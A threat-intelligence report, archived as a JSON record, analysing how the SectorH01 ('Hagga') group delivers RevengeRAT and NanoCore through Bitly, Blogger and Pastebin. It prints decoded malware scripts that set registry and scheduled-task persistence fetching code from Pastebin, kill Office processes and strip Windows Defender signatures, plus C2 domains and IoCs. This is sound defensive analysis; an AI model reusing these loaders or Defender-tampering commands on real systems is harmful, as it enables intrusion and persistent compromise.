{
	"id": "712ff0fc-e931-40f9-bc34-299b70a12075",
	"created_at": "2026-04-06T00:13:19.833835Z",
	"updated_at": "2026-04-10T13:11:50.491044Z",
	"deleted_at": null,
	"sha1_hash": "09e383b509c553ec6a6f664345bb85d4d3ba51ca",
	"title": "Hagga of SectorH01 continues abusing Bitly, Blogger and Pastebin to deliver RevengeRAT and NanoCore – Red Alert",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1325563,
	"plain_text": "Hagga of SectorH01 continues abusing Bitly, Blogger and Pastebin to\r\ndeliver RevengeRAT and NanoCore – Red Alert\r\nArchived: 2026-04-05 18:31:35 UTC\r\nOverview\r\n“Hagga” is the username of a Pastebin account used since December last year by a pervasive known group of threat actors\r\nwhich targets thousands of users around the world both for cyber espionage and cyber crime purposes using malspam. Their\r\nactivities were first discovered in 2017, and the ThreatRecon Team tracks both this group and the members behind “Hagga”\r\ncollectively as the SectorH01 group.\r\nSince their activities were first discovered, they have been observed using a variety of commodity malware being spread\r\nfrom the same hosts and communicating with the same C2 addresses. Some of those commodity malware used in the past\r\ninclude RevengeRAT and NanoCore, which they are still using till now.\r\nSectorH01 Group Attack Lifecycle\r\nTheir Targeting\r\n  Sectors the SectorH01 group has been observed targeting since discovery, likely for criminal purposes:\r\nAgriculture\r\nFood\r\nHospitality\r\nManufacturing\r\nNews Media\r\nShipping\r\nTourism\r\nTrade\r\nCountries the SectorH01 group has been observed targeting for this event:\r\nUnited States\r\nUnited Kingdom\r\nLatvia\r\nFrance\r\nGermany\r\nIndia\r\nJapan\r\nSouth Korea\r\nTaiwan\r\nThailand\r\nTurkey\r\nVietnam\r\nThe targets of the malware in this blog post appear to be only for criminal activities from June to September targeting\r\nenterprise users, the majority of whom are based in the United States.\r\n \r\nThe Phish\r\nhttps://threatrecon.nshc.net/2019/09/19/sectorh01-continues-abusing-web-services/\r\nPage 1 of 9\n\nSectorH01 group sends phishing emails to their targets with subjects related to payments, such as purchase orders,\r\ninvoices, request for quotations, telegraphic transfer confirmation documents, or overdue payments. In these emails, they\r\nattach file(s) related to the email contents in the form of Excel XLS, Microsoft Word DOC/DOCX, RTF, and ZIP files.\r\nSample Excel File (b4fdff7dbed8724bde2c097285ce5842373a3d5087f0d492479e62b48e3e5e2d)\r\n  In the cases of Excel XLS files, they have in recent months been using simple obfuscated VBA macros which executes\r\nmshta.exe against a Bitly shortened link which redirects to a Google Blogger (blogspot) link.\r\nVBA Macro which executes mshta.exe embedded in malicious XLS file\r\nThe Blogger page looks benign but has obfuscated JavaScript hidden in its source code. This pattern of obfuscating\r\nJavaScript code is extensively used not only in the Blogger page but also on Pastebin, which is obfuscated over multiple\r\nlayers and eventually decodes to various VBScript scripts which are run by the mshta.exe utility.\r\nSectorH01 commonly uses multiple layers of the same encoding for its Pastebin scripts\r\nBy performing the same decoding on the Javascript code, we get the VBScript which performs multiple tasks such as\r\nterminating processes and setting persistence.\r\nExample Decoded Script\r\n\u003cscript language=”VBScript”\u003e\r\nSet X7W832DSA = CreateObject(StrReverse(StrReverse(“WScript.Shell”)))\r\nDim ASSd712ji8asd\r\nASSd712ji8asd = “cmd.exe /c taskkill /f /im winword.exe \u0026 taskkill /f /im excel.exe \u0026 taskkill /f /im MSPUB.exe \u0026 taskkill\r\nX7W832DSA.Run ASSd712ji8asd, vbHide\r\nhttps://threatrecon.nshc.net/2019/09/19/sectorh01-continues-abusing-web-services/\r\nPage 2 of 9\n\nSet X_ws = CreateObject(“WScript.Shell”)\r\nPa_2da = “HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\WinUpdate”\r\nX_ws.RegWrite Pa_2da,”mshta.exe http://pastebin.com/raw/2gY9SAwU”,”REG_EXPAND_SZ”\r\nSet Mi_G = CreateObject(StrReverse(StrReverse(“WScript.Shell”)))\r\nDim X_hw\r\nX_hw0 = StrReverse(“t/ 03 om/ ETUNIM cs/ etaerc/ sksathcs”)\r\nX_hw1 = “n “”Avast Updater”” /tr “”mshta.ex”\r\nX_hw2 = “e h” + “t” + “t” + “p” + “:” + “/” + “/” + “p” + “a” + “s” + “t” + “e” + “b” + “i” + “n” + “.” + “c” + “o” + “m”\r\nX_hw = X_hw0 + X_hw1 + X_hw2\r\nMi_G.Run X_hw, vbHide\r\nSet Ox_xw = CreateObject(StrReverse(StrReverse(“WScript.Shell”)))\r\nDim P_wx\r\nP_wx0 = StrReverse(“t/ 003 om/ ETUNIM cs/ etaerc/ sksathcs”)\r\nP_wx1 = “n “”Avast backup”” /tr “”mshta.ex”\r\nP_wx2 = “e h” + “t” + “t” + “p” + “:” + “/” + “/” + “p” + “a” + “s” + “t” + “e” + “b” + “i” + “n” + “.” + “c” + “o” + “m”\r\nP_wx = P_wx0 + P_wx1 + P_wx2\r\nOx_xw.Run P_wx, vbHide\r\nself.close\r\n\u003c/script\u003e\r\nGoing into one of the scheduled tasks, we see more encoded text.\r\nExample First-Layer Decoded Scheduled Task\r\n\u003cscript language=”VBScript”\u003e\r\nSet EAsxw = CreateObject(StrReverse(“llehS.tpircSW”))\r\nDim Xsks\r\nXsks = StrReverse(“XEI|)OLOL$(gnirtSteG.IICSA::]gnidocnE.txeT.metsyS[;)14,201,63,44,93,101,021,101,64,001,801,501,711,66,3\r\nX_WRc = StrReverse(“P”) + StrReverse(“o”) + StrReverse(“w”) + StrReverse(StrReverse(StrReverse(StrReverse(“e”)))) + StrRev\r\nEAsxw.Run X_WRc, vbHide\r\nself.close\r\n\u003c/script\u003e\r\nFinally, further decoding shows it loading different malware from two Pastebin sites, which are again obfuscated.\r\nExample Second-Layer Decoded Scheduled Task\r\n[void] [System.Reflection.Assembly]::LoadWithPartialName(‘Microsoft.VisualBasic’);$fj=[Microsoft.VisualBasic.Interaction]\r\nAt other times, the decoded scripts will make use of .NET Reflection\r\nExample of .NET Reflection in Decoded Script\r\ndo {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);[void] [System.Reflection.Assembly]::LoadWith\r\nAfter looking at the various scripts used, we observed these obfuscated JavaScript code mainly serving one or more of these\r\npurposes:\r\nTerminating Microsoft Office processes winword.exe, excel.exe, MSPUB.exe, POWERPNT.exe, and sometimes\r\nWindows Defender processes MSASCuiL.exe and MpCmdRun.exe\r\nInterfering with Windows Defender via command “MpCmdRun.exe -removedefinitions -dynamicsignatures”\r\nSetting Registry Autorun Persistence to execute mshta.exe on a Pastebin url\r\nhttps://threatrecon.nshc.net/2019/09/19/sectorh01-continues-abusing-web-services/\r\nPage 3 of 9\n\nSetting Scheduled Task Persistence to execute mshta.exe on a Pastebin url\r\nExecuting malware in memory, sometimes in Microsoft’s .NET MSBuild.exe\r\nIn most cases, SectorH01 group in fact performed all of the above and sometimes multiple of the above by stacking multiple\r\nPastebin urls and multiple commands in a single url. Moreover, since SectorH01 group is using the “Hagga” Pastebin\r\naccount which has the ability to perform edits on the user’s pastes, they at times modify the paste to perform different\r\nactions. Below is the attack flow using this sample Excel file as an example.\r\nSite Action\r\nwww[.]bitly[.]com/adsodeasda Redirect to https://xasjow21d[.]blogspot.com/p/14[.]html\r\nhttps://xasjow21d[.]blogspot.com/p/14[.]html mshta.exe http://www[.]pastebin[.]com/raw/8uJavttD\r\nhttp://www[.]pastebin[.]com/raw/8uJavttD\r\n(1) MpCmdRun.exe -removedefinitions -dynamicsignatures\r\n(2) taskkill winword.exe / excel.exe / MSPUB.exe / POWERPNT.exe / MSASCuiL.ex\r\nMpCmdRun.exe\r\n(3) Run https://pastebin[.]com/raw/7EdEuebH via PowerShell\r\n(4) Run http://pastebin[.]com/raw/ri21rHbF via mshta.exe\r\nhttp://pastebin[.]com/raw/ri21rHbF\r\nDeobfuscates to RevengeRAT\r\n(CF6293824C97C45680CF999955FD48801856B424DC6E3CEAC6D5E36BB40928\r\nhttp://pastebin[.]com/raw/ri21rHbF [Paste\r\nEdit 1]\r\n(1) taskkill winword.exe / excel.exe / MSPUB.exe / POWERPNT.exe\r\n(2) Set Registry Autorun Persistence to execute\r\nmshta.exe http://pastebin[.]com/raw/2gY9SAwU\r\n(3) Set Scheduled Task Persistence to execute\r\nmshta.exe http://pastebin[.]com/raw/qZXnhtQG\r\n(4) Set Scheduled Task Persistence to execute\r\nmshta.exe http://pastebin[.]com/raw/Htp0LKHg\r\nhttp://pastebin[.]com/raw/ri21rHbF [Paste\r\nEdit 2]\r\n(1) ping Google\r\n(2) Run https://pastebin[.]com/raw/QppWFhGC via Reflection\r\n(3) Run https://pastebin[.]com/raw/Q8g1d6Be\r\nreplace(‘)\u0026*^’,’0x’) via Reflection\r\nhttp://pastebin[.]com/raw/2gY9SAwU Self.close()\r\nhttp://pastebin[.]com/raw/qZXnhtQG\r\n(1) Execute https://pastebin[.]com/raw/13AGuyHY\r\nvia Reflection\r\n(2) Execute k.Hackitup() in https://pastebin[.]com/raw/0e5uVXL0\r\nreplace(‘#@!’,’0x’) via Reflection\r\nhttp://pastebin[.]com/raw/Htp0LKHg Self.close()\r\nhttps://pastebin[.]com/raw/QppWFhGC\r\nDeobfuscates to a code injector\r\n(E22D550423F05EB685AD060A71D58B306E31C473D2D0CACF5794EC424FD3F\r\nObfuscated with ConfuserEx\r\nhttps://pastebin[.]com/raw/Q8g1d6Be\r\nDeobfuscates to NanoCore\r\n(E841F0008D9DA41CD815F75657D305DD69FC169C64FA283BF62DECD02B3D\r\nObfuscated with Eazfuscator\r\nhttps://pastebin[.]com/raw/13AGuyHY\r\nDeobfuscates to a code injector\r\n(84833991F1705A01A11149C9D037C8379A9C2D463DC30A2FEC27BFA52D218F\r\nObfuscated with ConfuserEx\r\nhttps://threatrecon.nshc.net/2019/09/19/sectorh01-continues-abusing-web-services/\r\nPage 4 of 9\n\nhttps://pastebin[.]com/raw/0e5uVXL0\r\nDeobfuscates to NanoCore\r\n(94B7C5C65637D33F031F1173A68C1D008DD948B6CCBAE42682F82A56D3CF6\r\nObfuscated with Eazfuscator\r\nUsage of bit.ly, blogspot and pastebin allows SectorH01 group to be less traceable on the infrastructure side, but it is\r\nbecause of this that we know their pastes center around the “hagga” user these days. As long as Pastebin tolerates this user,\r\nthey are likely to continue using the account because Pastebin pro accounts are no longer for sale.\r\nBut as pastes can be easily removed by incoming abuse reports, the SectorH01 group hedges their risk by getting to connect\r\nto multiple unlisted pastes. We see this same hedging they perform on their target endpoints, where they put multiple layers\r\nof persistence, use more than one type of RAT at the initial stage, and connect to multiple servers.\r\n \r\nRevengeRAT\r\n  RevengeRAT is a RAT which has its malware builder and source code publicly available. It is set to use the C2 address\r\nontothenextone[.]duckdns[.]org.\r\nSome of the configuration settings of this RevengeRAT variant\r\nRevengeRAT uses Base64 encoding for its C2 traffic and this information is easily decoded. From the configuration settings,\r\nwe see the key variable “Revenge-RAT” and the SPL variable “-]NK[-“, both of which are used as delimiters between the\r\nBase64 encoded data.\r\nhttps://threatrecon.nshc.net/2019/09/19/sectorh01-continues-abusing-web-services/\r\nPage 5 of 9\n\nInformation sent to the C2 in a past packet capture of this sample which can be easily decoded\r\nNanoCore\r\n  NanoCore is a RAT which was available for sale from 2014-2016 and has been leaked over the years. While the developer\r\nof NanoCore was arrested and sentenced last year, the RAT is still used by attackers.\r\n  In this case, the two NanoCore samples we found encoded in Pastebin sites attempted to connect to the C2 addresses\r\nattilabanks[.]ddns[.]net and yakka[.]duckdns[.]org. The C2 traffic of NanoCore is known to use the DES algorithm for\r\nencryption.\r\nSummary\r\nSectorH01 is a threat group which in most cases, targets seemingly indiscriminately at enterprise users; even when they\r\ntarget for espionage, their TTPs have been known to stay fairly constant. They remain brazen in their attacks although we\r\nsee a slight improvement in their operational security, and still use relatively simple tricks such as macros, known and\r\ndetected RATs but in-memory only, and connect to domains such as Pastebin and dynamic DNS servers which should raise\r\nred flags or at least questions. All of these should be opportunities for organizations to detect the SectorH01 group.\r\nIndicators of Compromise (IoCs)\r\nMalicious Documents (SHA-256)\r\nb4fdff7dbed8724bde2c097285ce5842373a3d5087f0d492479e62b48e3e5e2d\r\nc763340ae4acecd3e7d85b118bbad6bb4b1d433a6398571afd4c2c27a304ab4e\r\ne83304a5ae3e6ef366858c48aa8706d8e088aba86c724d575b4ad2e0ebaea7cd\r\nd757406ae30d7822ebe63c28ff09ac7b1eca1a0e37e6f706c442f4f7517a624b\r\n399b7823b707ac07c65940a30e85bdf5c0c7ed1bba5b5034ebcf189937636a44\r\nRevengeRAT (SHA-256)\r\nCF6293824C97C45680CF999955FD48801856B424DC6E3CEAC6D5E36BB4092856\r\nhttps://threatrecon.nshc.net/2019/09/19/sectorh01-continues-abusing-web-services/\r\nPage 6 of 9\n\nNanoCore (SHA-256)\r\n94B7C5C65637D33F031F1173A68C1D008DD948B6CCBAE42682F82A56D3CF6197\r\nE841F0008D9DA41CD815F75657D305DD69FC169C64FA283BF62DECD02B3D931E\r\nCode Injectors (SHA-256)\r\n84833991F1705A01A11149C9D037C8379A9C2D463DC30A2FEC27BFA52D218FA6\r\nE22D550423F05EB685AD060A71D58B306E31C473D2D0CACF5794EC424FD3F393\r\nC2 Domains\r\nontothenextone[.]duckdns[.]org\r\nhaggapaggawagga[.]duckdns.org\r\nattilabanks[.]ddns[.]net\r\nyakka[.]duckdns[.]org\r\nAbused Legitimate Services\r\nbitly[.]com/aswoesx2yxwxxd\r\nbitly[.]com/adsodeasda\r\nbitly[.]com/uiQSQWSQWSNnase\r\nbitly[.]com/aswoeosXxxwxhh\r\nxaasxasxasx[.]blogspot[.]com/p/kudi[.]html\r\nxasjow21d[.]blogspot[.]com/p/14[.]html\r\naxxwnxiaxs[.]blogspot[.]com/p/13[.]html\r\npastebin[.]com/raw/wZSPpxaG\r\npastebin[.]com/raw/2gY9SAwU\r\npastebin[.]com/raw/qZXnhtQG\r\npastebin[.]com/raw/Htp0LKHg\r\npastebin[.]com/raw/13AGuyHY\r\npastebin[.]com/raw/0e5uVXL0\r\npastebin[.]com/raw/8uJavttD\r\npastebin[.]com/raw/7EdEuebH\r\npastebin[.]com/raw/ri21rHbF\r\npastebin[.]com/raw/QppWFhGC\r\npastebin[.]com/raw/Q8g1d6Be\r\npastebin[.]com/raw/VpKuzs3R\r\npastebin[.]com/raw/kqm60tX5\r\npastebin[.]com/raw/3pEVfu9k\r\npastebin[.]com/raw/3VNZw83B\r\npastebin[.]com/raw/8Q050Drg\r\npastebin[.]com/raw/jX4MuzmX\r\nMITRE ATT\u0026CK Techniques\r\nThe following is a list of MITRE ATT\u0026CK Techniques we have observed based on our analysis of these and other related\r\nmalware.\r\nInitial Access\r\nT1193 Spearphishing Attachment\r\nExecution\r\nT1059 Command-Line Interface\r\nT1173 Dynamic Data Exchange\r\nT1106 Execution through API\r\nT1203 Exploitation for Client Execution\r\nT1170 Mshta\r\nhttps://threatrecon.nshc.net/2019/09/19/sectorh01-continues-abusing-web-services/\r\nPage 7 of 9\n\nT1086 PowerShell\r\nT1053 Scheduled Task\r\nT1064 Scripting\r\nT1204 User Execution\r\nPersistence\r\nT1108 Redundant Access\r\nT1060 Registry Run Keys / Startup Folder\r\nT1053 Scheduled Task\r\nDefense Evasion\r\nT1140 Deobfuscate/Decode Files or Information\r\nT1089 Disabling Security Tools\r\nT1054 Indicator Blocking\r\nT1202 Indirect Command Execution\r\nT1112 Modify Registry\r\nT1170 Mshta\r\nT1045 Software Packing\r\nT1055 Process Injection\r\nT1064 Scripting\r\nT1108 Redundant Access\r\nT1102 Web Service\r\nCredential Access\r\nT1056 Input Capture\r\nT1081 Credentials in Files\r\nT1241 Credentials in Registry\r\nDiscovery\r\nT1016 System Network Configuration Discovery\r\nT1033 System Owner/User Discovery\r\nT1057 Process Discovery\r\nT1063 Security Software Discovery\r\nT1082 System Information Discovery\r\nT1083 File and Directory Discovery\r\nCollection\r\nT1056 Input Capture\r\nT1123 Audio Capture\r\nT1125 Video Capture\r\nCommand and Control\r\nT1032 Standard Cryptographic Protocol\r\nT1065 Uncommonly Used Port\r\nT1094 Custom Command and Control Protocol\r\nT1105 Remote File Copy\r\nT1132 Data Encoding\r\nExfiltration\r\nT1022 Data Encrypted\r\nT1041 Exfiltration Over Command and Control Channel\r\nReferences\r\nhttps://threatrecon.nshc.net/2019/09/19/sectorh01-continues-abusing-web-services/\r\nPage 8 of 9\n\nSource: https://threatrecon.nshc.net/2019/09/19/sectorh01-continues-abusing-web-services/\r\nhttps://threatrecon.nshc.net/2019/09/19/sectorh01-continues-abusing-web-services/\r\nPage 9 of 9",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://threatrecon.nshc.net/2019/09/19/sectorh01-continues-abusing-web-services/"
	],
	"report_names": [
		"sectorh01-continues-abusing-web-services"
	],
	"threat_actors": [
		{
			"id": "28851008-77b4-47eb-abcd-1bb5b3f19fc2",
			"created_at": "2023-06-20T02:02:10.254614Z",
			"updated_at": "2026-04-10T02:00:03.365336Z",
			"deleted_at": null,
			"main_name": "Hagga",
			"aliases": [
				"TH-157",
				"Aggah"
			],
			"source_name": "MISPGALAXY:Hagga",
			"tools": [
				"Agent Tesla"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434399,
	"ts_updated_at": 1775826710,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/09e383b509c553ec6a6f664345bb85d4d3ba51ca.pdf",
		"text": "https://archive.orkl.eu/09e383b509c553ec6a6f664345bb85d4d3ba51ca.txt",
		"img": "https://archive.orkl.eu/09e383b509c553ec6a6f664345bb85d4d3ba51ca.jpg"
	}
}